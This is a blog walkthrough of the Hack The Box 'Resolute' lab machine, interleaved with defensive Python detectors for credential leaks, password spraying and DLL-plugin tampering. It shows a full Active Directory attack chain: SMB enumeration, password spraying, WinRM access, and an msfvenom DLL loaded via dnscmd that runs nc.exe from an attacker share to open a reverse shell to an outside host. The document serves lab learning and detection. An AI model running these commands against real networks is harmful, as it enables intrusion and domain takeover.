HTB platform: Resolute box walkthrough

To play this box you first need a Hack The Box account. For the exact steps, see my earlier article, a step-by-step introduction to registering for and using the Hackthebox platform.

Introduction

Through this box we can learn:

1. Use of the rpcclient tool

2. Use of the enum4linux tool

3. Use of the msfvenom tool (and, going further, Veil: an exe generated by Veil has a chance of not being flagged by 360 antivirus)

4. The DnsAdmins group privilege escalation vulnerability

Preparation

1. Add the target to the hosts file and scan the ports. Note that this is nmap's default fast scan, which only covers the most common ports, so some may be missed. If the ports found by the fast scan give no way in, use the -p parameter to scan specific ports; for example, the Redis and WinRM ports are sometimes not found by the fast scan and must be scanned explicitly with -p.

nmap -A resolute > port
root@kali:~/Hackthebox/resolute# cat port 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 15:09 CST
Nmap scan report for resolute (10.10.10.169)
Host is up (0.17s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-14 07:17:43Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

Ports of interest: SMB (port 445) and WinRM (port 5986, not shown by the fast scan).

2. Enumerate the SMB service: use enum4linux to gather information from the SMB server.

The -U parameter enumerates the user list and shows the related information.

For the other parameters, see enum4linux -h.

root@kali:~# enum4linux -U resolute
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 18 18:50:20 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... resolute
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================ 
|    Enumerating Workgroup/Domain on resolute    |
 ================================================ 
[E] Can't find workgroup/domain


 ================================= 
|    Session Check on resolute    |
 ================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server resolute allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 ======================================= 
|    Getting domain SID for resolute    |
 ======================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)

 ========================= 
|    Users on resolute    |
 ========================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela       Name: (null)    Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette      Name: (null)    Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika       Name: (null)    Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire       Name: (null)    Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude       Name: (null)    Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia      Name: (null)    Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null)    Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo      Name: (null)    Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki        Name: (null)    Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo        Name: (null)    Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per  Name: (null)    Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand     Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally        Name: (null)    Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon        Name: (null)    Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve        Name: (null)    Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie       Name: (null)    Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita       Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf  Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null)    Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
enum4linux complete on Sat Jan 18 18:50:44 2020

One piece of information is very important:

index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!

Account marko, password Welcome123!. Try logging in with rpcclient:

rpcclient -U marko resolute

Entering that password gives an authentication error.
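The description field above is exactly what a defender should audit in their own directory: a description or comment attribute that carries a credential. As an added example (not part of the original post), the following Python parses enum4linux-style user lines into records, flags descriptions that mention a password, and decodes the acb flags to list enabled accounts whose password never expires. The sample lines are constructed and modelled on the output above; the svc_backup account is invented for illustration.

```python
import re

# Constructed sample, modelled on the enum4linux "Users on resolute" output
# above; the svc_backup line is invented for illustration.
SAMPLE = """\
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand     Desc: (null)
index: 0x10c4 RID: 0x2779 acb: 0x00000011 Account: svc_backup Name: (null)    Desc: temp pwd is Backup2020, change before go-live
"""

# One "index: ... Desc: ..." line as printed by enum4linux (samrdump format).
LINE_RE = re.compile(
    r"index:\s*(?P<index>0x[0-9a-fA-F]+)\s+RID:\s*(?P<rid>0x[0-9a-fA-F]+)\s+"
    r"acb:\s*(?P<acb>0x[0-9a-fA-F]+)\s+Account:\s*(?P<account>\S+)\s+"
    r"Name:\s*(?P<name>.*?)\s+Desc:\s*(?P<desc>.*)$"
)

# SAMR account-control bits relevant to this audit.
ACB_DISABLED = 0x0001
ACB_PWNOEXP = 0x0200

# Words that usually precede a credential pasted into a description field.
SECRET_HINT = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)


def parse_users(text):
    """Turn enum4linux user lines into dicts; lines that do not match are skipped."""
    users = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["rid"] = int(rec["rid"], 16)
        rec["acb"] = int(rec["acb"], 16)
        rec["desc"] = "" if rec["desc"] == "(null)" else rec["desc"]
        users.append(rec)
    return users


def suspicious_descriptions(users):
    """Accounts whose description looks like it carries a credential."""
    return [(u["account"], u["desc"]) for u in users if SECRET_HINT.search(u["desc"])]


def password_never_expires(users, include_disabled=False):
    """Accounts flagged ACB_PWNOEXP: a leaked password is never rotated away."""
    return [
        u["account"] for u in users
        if u["acb"] & ACB_PWNOEXP and (include_disabled or not u["acb"] & ACB_DISABLED)
    ]


if __name__ == "__main__":
    found = parse_users(SAMPLE)
    for account, desc in suspicious_descriptions(found):
        print(f"[!] credential-like description on {account}: {desc}")
    print("[*] password never expires:", ", ".join(password_never_expires(found)))
```

The same parser works on a directory export from your own domain; the point of the acb check is that an account like marko, whose password is both published in its description and flagged never to expire, stays exploitable until someone notices.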

Getting user privileges

1. Try this password against the other users. There are two ways: manually, or with hydra. The second is used here. Note that hydra also needs the service module after the host (assumed to be smb in the command below) and the password is quoted to keep the shell from interpreting it.

hydra -L username.txt -p 'Welcome123!' resolute smb

That password turns out to be the password of user melanie.
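Spraying one password across every enumerated account is noisy on the domain controller: each miss is a failed logon (Event ID 4625) for a different user from the same source within seconds, and the one hit is a 4624 from that same source right after. As an added example from the detection side (not part of the original post), the following Python implements that check over constructed, flattened 4625/4624 records; the field layout and the sample addresses are assumptions, not real log data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, not real log data: Security log events flattened to
# "timestamp,event_id,target_user,source_ip,logon_type".
# 4625 = failed logon, 4624 = successful logon, logon type 3 = network.
SAMPLE_EVENTS = """\
2020-01-18T18:55:01,4625,abigail,10.10.14.32,3
2020-01-18T18:55:01,4625,angela,10.10.14.32,3
2020-01-18T18:55:02,4625,annette,10.10.14.32,3
2020-01-18T18:55:02,4625,annika,10.10.14.32,3
2020-01-18T18:55:03,4625,claire,10.10.14.32,3
2020-01-18T18:55:03,4625,claude,10.10.14.32,3
2020-01-18T18:55:05,4624,melanie,10.10.14.32,3
2020-01-18T19:30:00,4625,fred,10.10.10.50,2
2020-01-18T19:31:10,4625,fred,10.10.10.50,2
"""


def parse_events(text):
    """Parse the flattened records into dicts sorted by time."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, event_id, user, ip, logon_type = line.split(",")
        events.append({
            "ts": datetime.fromisoformat(ts),
            "id": int(event_id),
            "user": user.lower(),
            "ip": ip,
            "type": int(logon_type),
        })
    return sorted(events, key=lambda e: e["ts"])


def detect_password_spray(events, window=timedelta(minutes=5), min_users=5):
    """Flag a source that fails logons for >= min_users distinct accounts inside `window`.

    One account failing repeatedly from one source (fred above) is a brute force,
    not a spray, and is deliberately not reported by this rule.
    """
    findings = []
    by_source = defaultdict(list)
    for e in events:
        by_source[e["ip"]].append(e)

    for ip, evs in by_source.items():
        failures = [e for e in evs if e["id"] == 4625]
        best_users, best_span = set(), None
        start = 0
        for end in range(len(failures)):  # sliding window over the failures
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            users = {e["user"] for e in failures[start:end + 1]}
            if len(users) > len(best_users):
                best_users = users
                best_span = (failures[start]["ts"], failures[end]["ts"])
        if len(best_users) < min_users:
            continue
        # A success from the same source right after the burst means the spray hit.
        hits = sorted({
            e["user"] for e in evs
            if e["id"] == 4624 and best_span[0] <= e["ts"] <= best_span[1] + window
        })
        findings.append({
            "source": ip,
            "distinct_users": len(best_users),
            "first": best_span[0].isoformat(),
            "last": best_span[1].isoformat(),
            "later_success": hits,
        })
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(parse_events(SAMPLE_EVENTS)):
        print(f"[!] possible password spray from {f['source']}: "
              f"{f['distinct_users']} accounts between {f['first']} and {f['last']}; "
              f"later success for {f['later_success'] or 'none'}")
```

Thresholds are the tuning knob: a helpdesk host legitimately fails a handful of logons per day, so `min_users` and `window` should be set from your own baseline rather than the values used here.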

2. With a working credential, try the SMB server. List the shares first.

root@kali:~/Hackthebox/resolute# smbclient -U melanie -L resolute
Enter WORKGROUP\melanie's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Use the following command to enter a share on the SMB server:

smbclient -U melanie //resolute/<dirname>

After going through them, I didn't find anything of value.

3. Log in via WinRM (Windows Remote Management)

This needs the evil-winrm tool (evil-winrm.rb); the GitHub address is in the references.

Log in with WinRM:

root@kali:~/Hackthebox/tools/evil-winrm# ruby evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> cd /Users
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        1/18/2020   3:28 AM                ryan

At this point we have user-level access. Note that there is also a user ryan in this directory.

Information gathering

1. With user access obtained, the next goal is to escalate privileges. First, check the groups the current user belongs to.

*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /groups                                                                                                              
                                                                                                                                                                      
GROUP INFORMATION                                                                                                                                                     
-----------------                                                                                                                                                     
                                                                                                                                                                      
Group Name                                 Type             SID          Attributes                                                                                   
========================================== ================ ============ ==================================================                                           
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group                                           
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group                                           
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group                                           
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group                                           
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group                                           
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group                                           
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

The current user has only ordinary group memberships.

2. Knowing that the current user has no special privileges, the first job is information gathering, which here simply means browsing "suspicious" folders and files.

Make good use of two parameters of the ls command (in PowerShell, ls is an alias for Get-ChildItem):

-Force shows all items, including hidden ones.

-Hidden shows only hidden items.

*Evil-WinRM* PS C:\> ls -hidden


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        1/17/2020   5:52 PM      402653184 pagefile.sys

Notice the PSTranscripts folder: a folder that is not built into the system and has a suggestive name (this one contains the word script) deserves a closer look.

At the bottom of that folder tree there is a txt file:

*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -hidden


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

Open it and have a look: it is a PowerShell transcript log, and it contains something important.

It appears to be the password of user ryan: Serv3r4Admin4cc123!

3. Log in again with evil-winrm, this time as ryan, and check which groups the user belongs to.

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group

User ryan belongs to the DnsAdmins group; search Baidu and Google for DnsAdmins.

Important: DnsAdmins security vulnerability (reposted article, link in the references)

Put simply, a DNS administrator (a member of DnsAdmins) has read and write access to the DNS server configuration and can even tell the server to load a DLL of our choosing (the original article refers to the ServerLevelPluginDll setting) without the server verifying the DLL path. The command to set it is:

dnscmd.exe /config /serverlevelplugindll \\path\to\dll

Privilege escalation

1. Having run into this in earlier exercises, the description above immediately rings a bell.

Here msfvenom is used to generate a DLL that launches a reverse shell. Before that, complete the following steps:

(1) Download nc.exe (netcat), which provides the reverse shell. It is available from the official netcat download site (requires a proxy to reach from mainland China) or from the Baidu network disk mirror (extraction code: 6ksg); both links are in the references.

(2) Quick SMB server setup: download impacket from GitHub (link in the references) and install it by running python3 setup.py install.

Generate the DLL that starts the reverse shell. The windows/x64/exec payload runs a custom command; view its required parameters first:

msf5 payload(windows/x64/exec) > show options

Module options (payload/windows/x64/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

Only one CMD parameter is required.

Generate the DLL with the following command; the custom command runs nc.exe from our SMB share:

msfvenom -p windows/x64/exec CMD='\\10.10.14.32\tools\nc.exe 10.10.14.32 6666 -e cmd.exe' -f dll > reverse.dll

2. Start the SMB server. nc.exe and reverse.dll must be in the shared folder, and the share name must match the one used in the msfvenom command, here tools.

root@kali:~/Hackthebox/resolute/tools# smbserver.py tools ./
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

3. Point the DNS server at the DLL we prepared. Because the command is executed remotely, the IP address or host name of the DNS server must follow dnscmd.exe.

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe resolute /config /serverlevelplugindll \\10.10.14.32\tools\reverse.dll
                                                                                                                                                                      
Registry property serverlevelplugindll successfully reset.                                                                                                            
Command completed successfully.                                                                                                                                       
                                                                                                                                                                      
*Evil-WinRM* PS C:\Users\ryan\Documents>

Restart the DNS service:

sc.exe \\resolute stop dns
sc.exe \\resolute start dns
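Setting ServerLevelPluginDll leaves a clear trail for the blue team: a dnscmd.exe process with /serverlevelplugindll on its command line, a write to the DNS service's registry value (Sysmon Event ID 13, RegistryEvent Value Set, under HKLM\System\CurrentControlSet\Services\DNS\Parameters), and a stop/start of the DNS Server service (Service Control Manager Event ID 7036) shortly afterwards. On a healthy DNS server that value is normally absent, so any write to it deserves an immediate look, and one whose data is a UNC path most of all. As an added example (not part of the original post), the following Python runs those three checks over constructed Sysmon-style records and correlates the registry write with the restart that makes the DLL load; the field names follow Sysmon's process-create (ID 1) and registry-value-set (ID 13) events, and the sample values are modelled on this box, not captured telemetry.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events, not captured telemetry. Field names follow Sysmon
# (EventID 1 = process create, 13 = registry value set) and the Service Control
# Manager (EventID 7036 = service state change); timestamps are ISO 8601.
SAMPLE_EVENTS = [
    {"ts": "2020-01-18T08:00:00", "EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\EnableGlobalQueryBlockList",
     "Details": "DWORD (0x00000001)", "Image": r"C:\Windows\System32\dns.exe"},
    {"ts": "2020-01-18T20:01:00", "EventID": 1, "Image": r"C:\Windows\System32\dnscmd.exe",
     "CommandLine": r"dnscmd.exe resolute /config /serverlevelplugindll \\10.10.14.32\tools\reverse.dll",
     "User": r"MEGABANK\ryan"},
    {"ts": "2020-01-18T20:01:01", "EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll",
     "Details": r"\\10.10.14.32\tools\reverse.dll", "Image": r"C:\Windows\System32\dns.exe"},
    {"ts": "2020-01-18T20:01:20", "EventID": 7036,
     "Message": "The DNS Server service entered the stopped state."},
    {"ts": "2020-01-18T20:01:22", "EventID": 7036,
     "Message": "The DNS Server service entered the running state."},
]

# The registry value the DNS service reads its plugin DLL path from.
PLUGIN_VALUE_RE = re.compile(r"\\Services\\DNS\\Parameters\\ServerLevelPluginDll$", re.IGNORECASE)
DNSCMD_SWITCH_RE = re.compile(r"/serverlevelplugindll", re.IGNORECASE)
DNS_RESTART_TEXT = "DNS Server service entered the running state"


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def detect_plugin_dll_abuse(events, restart_window=timedelta(minutes=10)):
    """Return alerts for ServerLevelPluginDll tampering, correlated with DNS restarts."""
    ordered = sorted(events, key=_ts)
    restarts = [_ts(e) for e in ordered
                if e.get("EventID") == 7036 and DNS_RESTART_TEXT in e.get("Message", "")]
    alerts = []
    for e in ordered:
        if (e.get("EventID") == 1
                and e.get("Image", "").lower().endswith("dnscmd.exe")
                and DNSCMD_SWITCH_RE.search(e.get("CommandLine", ""))):
            alerts.append({"rule": "dnscmd_serverlevelplugindll", "ts": e["ts"],
                           "user": e.get("User"), "severity": "high"})
        elif e.get("EventID") == 13 and PLUGIN_VALUE_RE.search(e.get("TargetObject", "")):
            details = e.get("Details", "")
            remote = details.startswith("\\\\")  # UNC path: the DLL comes over the network
            # The DLL is only loaded when the service restarts, so a restart soon
            # after the write turns a suspicious change into an active compromise.
            restarted = any(timedelta(0) <= r - _ts(e) <= restart_window for r in restarts)
            alerts.append({"rule": "serverlevelplugindll_set", "ts": e["ts"],
                           "dll": details, "remote_path": remote,
                           "restart_within_window": restarted,
                           "severity": "critical" if restarted else "high"})
    return alerts


if __name__ == "__main__":
    for a in detect_plugin_dll_abuse(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['ts']} {a['rule']}: "
              + ", ".join(f"{k}={v}" for k, v in a.items() if k not in ("rule", "ts", "severity")))
```

The other write to the DNS Parameters key in the sample is ignored on purpose: the rule keys on the one value name rather than the whole key, which keeps ordinary DNS configuration changes out of the alert queue. The lasting fix is not detection but scope: membership of DnsAdmins should be as small as Domain Admins, because this page shows the two are effectively equivalent.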

Check the SMB server log: the DNS service fetches reverse.dll from the share when it restarts.

Check the listening port: the reverse shell connects back.

That completes the penetration; system-level privileges have been obtained.

References

[0] Reference article: https://blog.csdn.net/sdihvai/article/details/104031562

[7] evil-winrm GitHub address: https://github.com/Hackplayers/evil-winrm

[9] DnsAdmins security vulnerability (reposted article): https://www.anquanke.com/post/id/86080

[10] netcat official download (requires a proxy to reach from mainland China): https://eternallybored.org/misc/netcat/

[11] netcat Baidu network disk mirror: https://pan.baidu.com/s/15PkUoZYXHlBoD7LuV36PKQ

[12] impacket GitHub download: https://github.com/SecureAuthCorp/impacket

Posted on Thu, 25 Nov 2021 19:29:01 -0500 by Eskimo